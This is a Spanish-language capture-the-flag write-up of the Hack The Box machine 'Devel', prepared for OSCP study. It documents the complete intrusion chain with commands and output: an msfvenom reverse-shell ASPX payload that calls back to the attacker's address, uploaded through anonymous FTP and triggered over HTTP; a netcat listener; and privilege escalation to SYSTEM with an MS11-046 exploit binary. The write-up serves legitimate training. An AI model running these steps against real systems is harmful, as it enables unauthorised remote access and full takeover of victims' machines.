OSCP Path ~ Devel de Hack The Box (Necesario VIP)
Devel ~ Hack The Box to OSCP
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.5 "
Procedemos con el siguiente escaneo de Nmap
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
| 08-22-21 08:57PM 6 test.html
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Procedemos a enumerar el servicio FPT y ver si podemos bajar los recursos disponibles y subir archivos.
Descargamos los recursos disponibles y verificamos que podemos subir archivos como el usuario Anonymous.
Procedemos a subir un archivo llamado prueba.txt que subimos por el ftp, para ver si podemos apuntar desde la pagina web ya que vemos recursos web almacenados en el servicio FTP que podrian ser del servicio HTTP
# ftp 10.10.10.5 1 ⚙
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:pro): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put prueba.txt
local: prueba.txt remote: prueba.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
Lanzamos un Whatweb
# whatweb http://10.10.10.5 1 ⚙
http://10.10.10.5 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.5], Microsoft-IIS[7.5][Under Construction], Title[IIS7], X-Powered-By[ASP.NET
Procedemos a hacer Fuzzing a nivel web.
Al ser un servidor IIS 7-5 ssabemos que la extension de los archivos puede ser aspx
No encontramos Directorios potenciales..
Probamos a intentar apuntar al archivo que acabamos de subir al fpt llamdo prueba.txt
# curl -s -X GET "http://10.10.10.5/prueba.txt"
Se esta tensando que te cagas .. Ojito ..
Vemos que es nuestro archivo. Sabiendo esto y con las extensiones que trabaja el CMS IIS procedemos a crearnos una Reverse-shell con la herramienta msfvenom
# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=443 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2696 bytes
Y ahora que ya la tenemos vamos a ver si atraves del servicio FTP podemos subirla sin problema para luego apuntar a la misma y conseguir acceso a la maquina victima
# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:pro): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2731 bytes sent in 0.00 secs (74.4138 MB/s)
Procedemos a ponernos a la escucha en una session con netcat para recibir cualquier conexion entrante por el puerto 443
Procedemos a apuntar a la dirrecion HTTP + nuestro archivo shell.aspx
# curl -s -X GET "http://10.10.10.5/shell.aspx"
Recibimos la conexion correctamente:
# rlwrap nc -vlnp 443 1 ⚙
listening on [any] 443 ...
connect to [10.10.16.21] from (UNKNOWN) [10.10.10.5] 49157
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv> whoami
iis apppool\web
Probamos a sacar el systeminfo de la maquina victima para pasarselo a Windows-Exploit-Suggester:
# python windows-exploit-suggester.py --database 2021-08-27-mssb.xls --systeminfo ../systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
Vemos diferentes exploits para escalar privilegios, pero investigando un poco sobre exploits para privesc en una maquina Windows-7
Subimos este binario por el servicio FTP: ms11-046.exe
Directory of c:\inetpub\wwwroot ruta de los archivos almacenados FTP
27/08/2021 11:52 �� <DIR> .
27/08/2021 11:52 �� <DIR> ..
18/03/2017 02:06 �� <DIR> aspnet_client
17/03/2017 05:37 �� 689 iisstart.htm
27/08/2021 01:41 �� 112.725 ms11-046.exe
27/08/2021 01:41 �� 2.696 shell.aspx
17/03/2017 05:37 �� 184.946 welcome.png
4 File(s) 301.056 bytes
3 Dir(s) 22.273.048.576 bytes free
Ejecutamos el binario:
ms11-046.exe
ms11-046.exe
whoami
whoami
nt authority\system